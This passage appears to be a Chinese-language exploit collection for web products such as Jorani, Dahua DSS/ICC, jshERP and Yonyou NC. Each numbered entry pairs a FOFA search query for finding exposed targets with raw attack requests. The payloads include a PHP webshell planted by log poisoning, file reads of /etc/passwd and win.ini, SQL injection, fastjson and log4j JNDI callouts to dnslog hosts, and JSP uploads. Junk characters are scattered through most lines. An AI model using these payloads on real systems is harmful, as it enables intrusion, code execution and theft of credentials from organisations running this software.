- l1 ?; g/ y% ~5 O! V/ ?Host: 127.0.0.1
# z, w/ e2 O, |Pragma: no-cache+ \6 O8 ~* W# a
Cache-Control: no-cache
% z& a9 V8 @9 _Upgrade-Insecure-Requests: 1( d* z0 o: A) ^1 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36: m# f6 d$ _7 W) I0 m7 ~" `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 ?! _: T) R! YAccept-Encoding: gzip, deflate$ C# l" \7 u Z( R; r5 L; a
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+ n5 A) X: A" e# IConnection: close
3 a6 |6 [$ T* c$ M( ]6 f# g f/ I- w/ j7 N* K S
3 W+ k7 T: H; N' `7 f% f
12. Jorani < 1.0.2 远程命令执行; d$ Q- B: r! V' v
FOFA:title="Jorani"
3 m! h7 F: M9 r$ Q8 D1 N第一步先拿到cookie j6 }! U4 B! o r, q& U; m
GET /session/login HTTP/1.1! I- G: }) r3 l* u/ o. a
Host: 192.168.190.30
* l' l0 H9 O8 |$ D# sUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.361 S4 f6 T" R# k( ]3 p
Connection: close" W! H/ ~: W2 ^
Accept-Encoding: gzip+ X4 [1 H- _6 {3 M; Y0 t4 m
6 j9 H! \$ b2 @ F! \
3 k0 t2 n: C. `- o! y+ Q( u响应中csrf_cookie_jorani用于后续请求
( d5 T5 {8 m4 T. e7 DHTTP/1.1 200 OK% |% H: @- ?! c0 d2 O
Connection: close
# Y0 R6 z% u: j8 p0 o) ~9 xCache-Control: no-store, no-cache, must-revalidate% ~; `; L+ m K0 F
Content-Type: text/html; charset=UTF-8% Y( y6 [; J5 e, d0 }
Date: Tue, 24 Oct 2023 09:34:28 GMT; X( J8 X# T; a" [9 y
Expires: Thu, 19 Nov 1981 08:52:00 GMT
# K4 @. G) Z5 X- D& _$ iLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
) @. ]# p/ e8 F$ d: m, x. Y% b' E% YPragma: no-cache
0 X4 O* c6 z. R/ hServer: Apache/2.4.54 (Debian)
6 E" P0 p; l( {- V2 eSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
- d& l# ~: l# M" f8 sSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
3 R& k/ _2 H7 f. p: {Vary: Accept-Encoding! G, v0 P; [, M6 P; Y
6 k. M6 o' w5 J% K I# T
$ q/ M6 l& S5 {# ~% ~" X \! h
POST请求,执行函数并进行base64编码
) R3 J+ v$ ?. X( }) k. [POST /session/login HTTP/1.1- I6 V7 L; ]4 }, U! {9 g3 \4 M
Host: 192.168.190.30% P7 b1 V0 M' d, Y, l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
( ]) y2 n" W4 I- O- mConnection: close
- C1 }% C6 u% d, ^Content-Length: 252
" F/ `* T: T+ [. P5 a# r/ O+ x+ }3 ?Content-Type: application/x-www-form-urlencoded, H3 ?! k7 E- P, ~
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r( F9 ]2 q* t2 t# s0 {
Accept-Encoding: gzip
0 C y& P/ E; k& m/ v% a$ D. k: h* ]/ h( j
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
# K3 ^9 z+ M2 p5 k6 [; T' ?) z" u' \* D9 Y* e$ z
3 ^9 U2 s' }" n/ |8 A7 o0 F" L# @% H9 S
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串9 t1 c$ `' y5 ^2 Y$ @
GET /pages/view/log-2023-10-24 HTTP/1.1
1 e, ^& T1 \& K; J* m! RHost: 192.168.190.30
* |* m1 w% I. y1 D( e6 n) Y! @: VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36* Q" y7 ]7 P# h& H, m3 R" I
Connection: close
0 Y" b0 S$ q* l* DCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r% T# Q2 q1 x5 b0 w. t' q
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
9 `" s0 L. e& I! B3 K. FX-REQUESTED-WITH: XMLHttpRequest/ Q) Y: I7 {4 o
Accept-Encoding: gzip
% P6 P; M/ o1 l
1 |9 c7 R3 B2 ~) |3 U' E! ~' d) A, w. j* l# F
13. 红帆iOffice ioFileDown任意文件读取
6 a. P( v! R+ C* O" iFOFA:app="红帆-ioffice"- L- p9 S# r* ~
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
; c* \3 U9 p7 x% x" a' UHost: x.x.x.x
; I6 h: Q, [$ @" NUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
& [3 g; G$ s3 wConnection: close
' J4 A' g0 E$ \8 M% m) \6 A! VAccept: */*
; r a- f3 p( v! w1 |Accept-Encoding: gzip
, Q$ }0 v! F$ F, @% V
" [7 c4 B9 W6 K- H6 C' c7 g9 b4 T5 _0 \$ T- `
14. 华夏ERP(jshERP)敏感信息泄露 o& Q6 W+ F7 z& Z" y2 W x
FOFA:body="jshERP-boot"- F0 T8 t( {6 l, H1 ~
泄露内容包括用户名密码3 k' V+ o: D' D
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
9 c% ^5 L E& \& f1 O7 U1 g7 Z8 `Host: x.x.x.x
U+ u$ Z. u1 `* Q0 R2 xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
! J P1 w* }1 ] p6 ~( J3 IConnection: close
3 O( p/ Q* j# m" NAccept: */*
( D( a' K D' |# Z4 Q; i6 TAccept-Language: en
* r9 D3 b+ [' |" f" Y& a* S9 oAccept-Encoding: gzip3 J* Z9 z1 t1 T
- \" z% y& L! j: t! a9 t9 b+ `4 w
4 H( F2 @. H" G2 g o8 Q( \
15. 华夏ERP getAllList信息泄露- \# D0 R9 e6 N# {: h# P
CVE-2024-0490' s# R/ d b0 d: f6 f# K! X
FOFA:body="jshERP-boot"& v4 K; ~( F, | J
泄露内容包括用户名密码
7 E$ [+ H, s7 h+ qGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
& P, u6 ]8 S( ~4 e% CHost: 192.168.40.130:100
2 |) o* p5 ]+ jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
! r3 E( X4 i, sConnection: close
7 A' B0 L& c' y1 `# @Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8" S% C% c* B( W2 E$ V, Q0 a
Accept-Language: en" X5 G- {. u' r2 ~6 I% S6 x
sec-ch-ua-platform: Windows
: K. t/ c) N: z6 c4 zAccept-Encoding: gzip0 g. W% Q- K4 R5 t3 {. e* t
' W" L; ^" R; ]7 X$ g
9 x: S8 N( [. W" [% n% x9 X4 u
16. 红帆HFOffice医微云SQL注入
0 @. o0 W# p& Y X& B h3 \7 D0 iFOFA:title="HFOffice"
8 u( V4 [% J" n( f- U& Q, Gpoc中调用函数计算1234的md5值9 l* B4 t& n( }5 k& i" @1 T9 E
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
# T) p8 x" ~$ x q' l$ L0 vHost: x.x.x.x
5 B4 l# L! k& ?User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
% ^3 @) u2 |7 o0 C9 q+ NConnection: close. V; l0 E. b. |) q0 p: e% M i2 ?0 s
Accept: */*
3 V- o( I$ _" g/ {2 u+ `Accept-Language: en
" G. T/ k+ L" q9 u% `Accept-Encoding: gzip( J! A3 o2 G5 L# I$ F5 ~
0 \: d# f S' \
1 J' z M. F I5 _6 N1 f7 U i; Q$ G7 r17. 大华 DSS itcBulletin SQL 注入 t8 L- K& D8 ]4 z8 H
FOFA:app="dahua-DSS", m! T2 R" P$ l0 h" f
POST /portal/services/itcBulletin?wsdl HTTP/1.1
& n( X$ B' F. DHost: x.x.x.x
7 \& E/ I- T$ R* L" k6 lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 p' U H7 A% o' ]7 pConnection: close. c+ `) r& P2 g; g7 [# w9 j
Content-Length: 345
& }2 e' S( w* }$ e( zAccept-Encoding: gzip
' _6 l! v$ ?2 C+ p/ M# F# r1 a/ _+ F. N
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>7 p' h( L1 Q6 }% M+ O6 G" s$ J1 c
<s11:Body>4 T, ]. z) u, H0 x
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>% M; v3 [8 Q- }! \. q+ A
<netMarkings>1 v3 H" s y7 y3 j' D6 r) c
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
" A' J V7 i% V: h- V6 Q( Y </netMarkings>
4 F0 M& b) b" M1 O* s </ns1:deleteBulletin>
8 ~. Y& f. B" u u6 H) b& m </s11:Body>" v( G9 P% S: c2 w/ ^1 P+ i
</s11:Envelope>
7 p F g/ n* \/ r( m3 B/ e
5 q+ Q d, h7 Q& W% b: h! _ \( g, \' | f4 [
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露; T) B! u4 F Z- l4 e0 {4 F# Y
FOFA:app="dahua-DSS", g1 t0 B( C( N8 P. I
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
$ \! A9 V& g6 l5 {Host: your-ip
/ [* Q" F! W% n) eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
G# O' W9 |: B% u c% ^( _# }+ QAccept-Encoding: gzip, deflate
* g. T' w$ I5 JAccept: */*9 [( B0 R7 e# ]8 |' f( v; s
Connection: keep-alive
# ? E* P2 m) s6 y4 B3 l+ n( k( S q
6 g. s, I% U& ?) m" O9 E2 d
: H5 |! F( g* W, |! l' j19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
& u0 t* ^- t, B3 O4 O' |1 V* ?FOFA:app="dahua-DSS"& C% F& D/ |' I+ M+ A
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1% P$ Q5 h- Y/ x! T
Host:* t3 d: g; e8 q8 g8 g- L
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36$ r9 w+ @3 n: y' y( [/ m" s
Accept-Encoding: gzip, deflate, w. D& a6 M6 w# |6 S: L* V
Accept: */*) t1 [& G* l* W! ^; g [' `' T
Connection: keep-alive
$ ]7 B# w9 ?- k% z: {; M/ \6 \( I0 v2 f/ E8 u3 R7 w8 W( F3 H
% ~# ~# `- g$ c0 E0 X3 p2 i4 _2 G20. 大华ICC智能物联综合管理平台任意文件读取" O7 e L- ^1 O& [3 F5 U
FOFA:body="*客户端会小于800*"0 z5 l9 X a3 c' _! T- Q
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
* |3 D+ W3 ~. K" ]. Q: {% _: MHost: x.x.x.x
0 R6 c% Q6 ~" b& l) z. jUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
/ Z, B O9 M4 Z* D# v% ?Connection: close/ B2 }; D' W! V7 C
Accept: */*
( x. |+ ?& r% }& J. uAccept-Language: en
! X2 ^5 O5 B4 g5 M E1 t; FAccept-Encoding: gzip
% J+ T" C4 B6 ?/ t" O* R, Q, ~
4 J& e4 Z ^4 C3 [% ]8 [$ O. B
/ s0 G$ a% o3 Q; y7 K/ _21. 大华ICC智能物联综合管理平台random远程代码执行
& m! d0 E4 U# e$ w9 M& ~# j( jFOFA:icon_hash="-1935899595"6 J+ l* _8 F6 B, ]) {0 C" ?
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.16 n/ y3 F: \5 \" B
Host: x.x.x.x
7 H; T. W2 I3 ^; @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: t5 H4 R/ f$ S! k+ W* t* b
Content-Length: 161: O. L9 {! v* V$ G/ W" x* O
Accept-Encoding: gzip5 s- |9 ~! `/ a1 G2 T! d
Connection: close
. R0 L" \, D" E- YContent-Type: application/json;charset=utf-84 b: E% e, P$ W) Z+ i6 G
* f/ ]/ D/ X Z{
+ }4 ?' _& j- z9 L& Y"a":{
3 ^. ^4 x% J5 P+ q5 w' q "@type":"com.alibaba.fastjson.JSONObject",* U7 Q' c9 T: P( S$ J' P# g
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}0 o: l. b( B! D3 {1 i2 x
}""5 \: G- u: J* f2 b" \0 M2 }
}
0 _* J# j$ L c7 E5 Q- y: b7 n: n1 n& j6 F2 p0 P
. s' M& n( l; }- ^+ q
22. 大华ICC智能物联综合管理平台 log4j远程代码执行& h0 y$ \# s, N. e2 \
FOFA:icon_hash="-1935899595"
: {2 O( L3 [; p) jPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1' x. g# v: S1 X# l
Host: your-ip% p) J5 Y# z6 T. @# n! I" s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
. L1 _( @1 Q& uContent-Type: application/json;charset=utf-8/ z8 N: s- G" u9 b7 w/ m
5 O# Y$ b$ V* y# P$ v{
( a! X2 \+ y1 f2 t) g"loginName":"${jndi:ldap://dnslog}"; |+ E* x2 }# T/ Y
}' g& ^$ \& \7 d' b# ^$ z
7 n0 R2 \; {' `$ x7 Z% M p/ A& F- t' m. A' n$ N; W
5 d3 y1 ?- R+ p2 R+ o! |* ]7 ~23. 大华ICC智能物联综合管理平台 fastjson远程代码执行3 z3 u+ S w! G8 m
FOFA:icon_hash="-1935899595"3 ?9 K. u5 p: a: [: d6 j# z8 Z
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.10 a0 z; j* _1 _7 g
Host: your-ip
. B1 W' v# ?( I) jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- ~ V4 Y+ e: ~$ ^
Content-Type: application/json;charset=utf-8- M2 n0 B! ^7 p4 Z" [1 T
Accept-Encoding: gzip0 e5 h, y5 U6 W8 X, B
Connection: close
! r1 o) T6 t' x/ ~/ [
1 U/ M: k' k5 {4 \) D/ A3 U3 v8 x{3 Y G% O' S0 u2 ?7 V
"a":{
; ?1 o" ^: h% _: P. v "@type":"com.alibaba.fastjson.JSONObject",
" j3 b% k* m9 U. k2 m' y0 m {"@type":"java.net.URL","val":"http://DNSLOG"} ?/ y: C' Q& `' d! }
}""
1 U5 d9 Z A5 R2 p}- U0 M7 R. m% x) n3 n9 E( }
" ]+ N+ k1 h5 F8 d& n- M& F
+ X. |) ]- z: w' p- E% D5 q' f: A
24. 用友NC 6.5 accept.jsp任意文件上传% |) ?: L2 D' y% |5 r! \0 {* }
FOFA:icon_hash="1085941792"
; G3 O* M/ f+ O% o' cPOST /aim/equipmap/accept.jsp HTTP/1.15 |8 ^0 |4 t- I0 b/ Y! v: q
Host: x.x.x.x# x* w; ^1 P+ _8 h9 @
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36( \; H% A. ^# a7 T w5 W
Connection: close( f) D1 r5 \# c7 _! n) }) U
Content-Length: 449
9 m9 {6 C1 ]7 dAccept: */*) _: ^+ V, ^4 }! o3 i
Accept-Encoding: gzip
9 j+ A" p6 }% EContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc' J0 g5 w4 B: p# y" [ O4 P
, l: h' ]' W! p4 J! \8 O: W6 G
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc# M' J! ?: `; {+ `; z; j& D
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
& b. W: g' y6 ~9 WContent-Type: text/plain5 w* Z" @1 p4 i9 F" o5 R+ x
- }# ^! P3 r8 G: e" I4 @ |
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>+ ]: U9 C: A c# @1 J
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
/ w0 x) c% A% d* \; n0 ?Content-Disposition: form-data; name="fname"
- n( `0 v U) s$ e. e) P: f0 L+ [9 h% K o# y. Z# \/ F6 B
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp7 [$ ]+ \: ~: |/ U+ Y9 `; E
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--7 A# |( g T* Q
: P, U+ u/ o( I2 g% W) h" w( S3 f+ Y0 ~' F
25. 用友NC registerServlet JNDI 远程代码执行- H- K8 c. X& t8 V: J7 U+ A
FOFA:app="用友-UFIDA-NC"
8 C: @* E" ]) e3 qPOST /portal/registerServlet HTTP/1.15 X6 P v$ X, u0 B. o) `1 J- c( x
Host: your-ip/ }* i- l }: Z6 H8 i" U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
. r& H d2 Z uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
! [! i3 t; S( C% [ t3 a1 k$ EAccept-Encoding: gzip, deflate
) l& W$ o: N4 u" u: F4 F0 I; ?Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.67 N8 U9 c( O: x: T$ ] E
Content-Type: application/x-www-form-urlencoded, ]' a, p5 _# r6 V: ^, C
2 C& G* Q7 l; o
type=1&dsname=ldap://dnslog$ P3 X/ b" D# I3 C
7 R/ E( ^! T, O5 E. K
* E( i% ~9 X) x8 P5 y
# m) Q4 c7 [( s. i& D0 @/ N$ e9 p0 U/ P26. 用友NC linkVoucher SQL注入7 u1 n, y' j- H, \1 e: q( `9 E; ~
FOFA:app="用友-UFIDA-NC"
% A5 O n! Q, ~7 @& bGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1 Z: I8 I% c( Q- h; Z. l
Host: your-ip
8 f! ?) W8 X* J$ G: S8 VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 X9 U6 M6 F& i$ r+ l8 D! k
Content-Type: application/x-www-form-urlencoded
l; h0 j3 _: g& |Accept-Encoding: gzip, deflate8 q( c, R0 j/ P2 ^5 p! I& u% R
Accept: */*- O$ R* D& y4 {0 R& Q4 \4 S6 a
Connection: keep-alive
& b( o5 Y9 n) W) Y# A7 S
$ x6 U+ V% C( C( }3 h/ N8 c" d1 z0 @
27. 用友 NC showcontent SQL注入
4 n* f, _- P; g, l+ k" u/ fFOFA:icon_hash="1085941792"+ [8 [* l- Y% d" K7 d5 L6 Q; m
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
4 q: A! W1 u- p+ ~$ {: FHost: your-ip2 K- N" G4 h" f7 @# Z N6 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 W& g2 s3 c, F, B3 x5 X( {1 R4 K" X
Accept-Encoding: identity
( D6 _5 A; P. Y0 i3 m+ e( NConnection: close9 {- y5 c* y% n, L; w5 y
Content-Type: text/xml; charset=utf-8
5 \5 m! S, i$ d/ E; W, C+ U4 s1 m" M$ k* s" J- D
0 D" d! V" i1 u3 \ l( o
28. 用友NC grouptemplet 任意文件上传1 Y9 r, a3 d4 y/ A
FOFA:icon_hash="1085941792"
9 ~. l2 q( e B- B0 a7 I8 ]POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.17 {) H, t( a/ H ^% a
Host: x.x.x.x
I* \# L ^" h1 a" }. ? vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
2 M& L' E, p( `# |$ }& z' XConnection: close
, X* O, o* P1 r8 [6 @4 z2 WContent-Length: 268
3 O" P2 _7 T0 L+ E0 f# {Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
% \) h! A$ x, E) a. \+ B+ v- c- ~# ?Accept-Encoding: gzip' a3 L! i d, \
/ |8 {/ g/ r9 A- P# I7 P, `------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
" o" F! M. w1 I" p2 rContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
i+ e1 }% ?: g5 j/ EContent-Type: application/octet-stream4 G E& @1 U+ j! Z( \0 Q
, g. C9 i- ? f" g' M
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>5 {6 y: ]& f5 t( R8 Y6 H
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--* a2 I b$ a, e# j$ ?- I8 n
3 [+ @' u6 C x5 B& s% g0 }: i* @$ P" N7 j
/uapim/static/pages/nc/head.jsp( X9 r/ D+ J0 {7 E K! {
/ u8 R5 K: n) M E, m8 A1 ~
29. 用友NC down/bill SQL注入. l9 F, R! e y1 f" I/ l
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
8 `/ C- z" Q+ pGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1 h/ i0 K! E$ j9 f
Host: your-ip
0 P4 ^" I3 _0 K# D. GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- h8 m9 H8 x) D* o" FContent-Type: application/x-www-form-urlencoded! `& a9 x8 T5 V. d9 V) @
Accept-Encoding: gzip, deflate
# [+ W8 p6 x3 S2 ]" n, O: tAccept: */*
6 j# T& R1 M& d' [ ?Connection: keep-alive- }' r7 Z0 Y2 [+ I
+ {" s& w- X) R- H, H9 ]! d8 f
6 v1 ~9 c; A, C: K- C8 \# Q30. 用友NC importPml SQL注入
9 r) m& I, |' C: }0 |$ |FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
1 {) _, I: E; ]POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1, b# `4 O- H$ w$ m
Host: your-ip. @- q# K5 F. g6 I5 g0 V( W
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
! a3 V, b1 C( gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.363 ?, _2 B: D, e; ]& V
Connection: close! f1 J" W5 R, f ?; _5 w1 P
0 e5 o$ M+ f0 o* c) P# I1 [, H1 R------WebKitFormBoundaryH970hbttBhoCyj9V% A+ E( S' p3 X' ^" k$ ]
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
' c6 ]+ V4 f( D6 C) f2 X8 m- TContent-Type: image/jpeg
' ?* N* g/ N1 G! q4 w6 C------WebKitFormBoundaryH970hbttBhoCyj9V--6 C1 T0 Y3 Z3 q- z9 J% l5 s
. ^1 |: Z2 {! k8 O X: }
2 U5 O. P- G6 z; p7 a8 W( Y
31. 用友NC runStateServlet SQL注入
6 S0 q) S. c$ f7 G% `version<=6.5
P: y6 A" ]* ?* D' U2 p/ }6 ^FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"& B: K( ]9 Y" Z0 v, }% w
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1$ D" i& |6 ]8 k. }% k6 k
Host: host
- O# D) l+ y+ w2 O, LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.362 T; P- \9 F( ], b6 @: \$ S0 u G& L
Content-Type: application/x-www-form-urlencoded2 r6 J3 ]9 _, h( g+ {7 Q& o9 [9 j
/ X- r8 e7 ] X9 |2 I5 e; v
: m# ~) T4 m: _. V# y6 g, V32. 用友NC complainbilldetail SQL注入
- L M/ a0 e: L5 J; L& k, cversion= NC633、NC65, D$ k, i& S$ C& v9 L
FOFA:app="用友-UFIDA-NC"
/ I. N$ {9 A% V( U" z. a; v. ^% M. V% ~GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
- V* @! n1 H. ?Host: your-ip6 g* o Q4 A- w* d" M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 ?3 i/ h0 m9 U
Content-Type: application/x-www-form-urlencoded" Z% |7 `0 p% H D' i
Accept-Encoding: gzip, deflate5 w/ |( i: |& o3 `! ?! n6 Q3 F
Accept: */*6 O3 R# L1 \9 p( _) G) }# B' I
Connection: keep-alive. Y+ `7 P+ W* ]# |! B g9 L; H
, `7 m! a9 u+ q: Q& T( a. a6 o, z( y; U9 X$ h$ }7 U2 O' f
33. 用友NC downTax/download SQL注入5 X4 X. v ^ X9 Y
version:NC6.5FOFA:app="用友-UFIDA-NC"
' q* i* j$ o# |7 V0 y7 [( K8 @GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
: l3 z" d" c5 B g( l9 a1 mHost: your-ip2 a4 Y3 c3 U0 [) ~7 O: J' h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ R. {! W- ?0 Q- u K, a
Content-Type: application/x-www-form-urlencoded
2 W" a. ]$ l, i9 _* oAccept-Encoding: gzip, deflate
; n$ N! z! ~9 I1 R( w9 z0 `4 @; }# lAccept: */*6 j; t/ C _: Z8 `3 g4 a
Connection: keep-alive5 X0 Q9 q8 [6 r4 @% ], l2 o+ K" f
1 j4 g6 d6 p! i+ t8 g
2 t' o6 A& q6 ?; [/ |
34. 用友NC warningDetailInfo接口SQL注入& b# ^1 l% ]! E! p
FOFA:app="用友-UFIDA-NC"* D- z) P2 p: T$ n0 Q0 F9 _; T6 g; M
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
7 ?7 B z. w' a0 }- uHost: your-ip
" g1 [. K, n" R4 e$ i$ ~$ J7 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* X- w! {5 E: l* @ R7 i
Content-Type: application/x-www-form-urlencoded
! z; Z3 ~+ T7 r) xAccept-Encoding: gzip, deflate& {+ d8 h! T r4 u
Accept: */*
" V' K3 O- E8 ^, mConnection: keep-alive
( N. p4 h$ |0 f: |- m3 R/ a& u s+ [% O0 j8 D
; C, ]: o* T9 p9 u0 A6 d35. 用友NC-Cloud importhttpscer任意文件上传
4 v) m2 M* y9 p$ _5 e }FOFA:app="用友-NC-Cloud"/ N' n+ }8 h9 |9 \
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
